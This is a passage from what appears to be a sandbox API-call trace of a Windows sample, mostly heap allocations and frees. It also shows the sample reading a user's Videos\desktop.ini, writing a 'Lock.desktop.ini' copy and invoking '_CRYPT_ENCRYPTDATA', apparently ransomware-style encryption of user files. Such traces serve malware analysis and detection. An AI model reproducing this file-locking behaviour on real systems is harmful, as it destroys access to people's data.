returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0257.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0257.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0257.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0257.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0257.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0257.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0257.890] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0257.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0257.890] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0257.890] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0257.890] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0257.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0257.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0257.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0257.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0257.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0257.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0257.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0257.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0257.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0257.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0257.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0257.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0257.891] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/desktop.ini" (normalized: "c:\\users\\fd1hvy\\videos\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0257.892] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0257.892] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0257.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0257.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0257.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0257.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0257.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0257.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0257.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0257.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0257.892] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0257.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0257.893] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0257.893] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0257.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0257.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0257.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0257.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0257.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0257.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0257.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0257.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0257.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0257.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0257.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e58910 [0257.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0257.894] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos/" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0257.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0257.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0257.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0257.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0257.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0257.895] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/Lock.desktop.ini" (normalized: "c:\\users\\fd1hvy\\videos\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0257.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0257.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0257.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0257.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0257.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0257.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0257.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0257.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0257.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0257.896] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0257.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0257.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0257.897] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0257.897] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0257.897] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0257.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0257.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0257.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0257.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0257.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0257.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0257.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0257.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0257.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0257.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0257.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0257.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0257.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0257.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe57020 [0257.971] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0257.971] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x1f8, lpOverlapped=0x0) returned 1 [0257.973] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0257.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0257.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0257.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0257.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0257.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1f8) returned 0x2e561a8 [0257.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe57020 | out: hHeap=0x970000) returned 1 [0257.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0257.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0257.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0257.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0257.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0257.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0257.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0257.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0257.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1f8) returned 0x978270 [0257.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0257.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0257.977] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0257.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0257.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0257.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0257.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0257.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1f8) returned 0x2e561a8 [0257.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0257.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0257.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0257.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0257.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0257.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.978] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0257.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0257.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0257.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0257.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0257.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0257.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0257.978] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0257.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a08 [0257.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0257.978] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0257.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a08 | out: hHeap=0x970000) returned 1 [0257.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0257.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0257.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b38 [0257.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0257.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0257.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0257.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0257.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1f8) returned 0x2e561a8 [0257.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0257.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0257.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0257.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0257.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0257.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0257.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0257.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0257.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0257.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0257.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0257.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0257.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0257.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0257.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0257.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0257.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0257.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0257.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1f8) returned 0x978470 [0257.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0257.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0257.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0257.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0257.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0257.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0257.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0257.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0257.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0257.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0257.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0257.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0257.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0257.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0257.981] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.981] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.981] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.981] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.981] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.981] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.981] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0257.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0257.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0257.982] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.982] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0257.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0257.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0257.982] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0257.982] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0257.982] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.982] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0257.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ce0 | out: hHeap=0x970000) returned 1 [0257.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0257.982] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0257.983] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0257.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0257.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0257.983] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.983] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 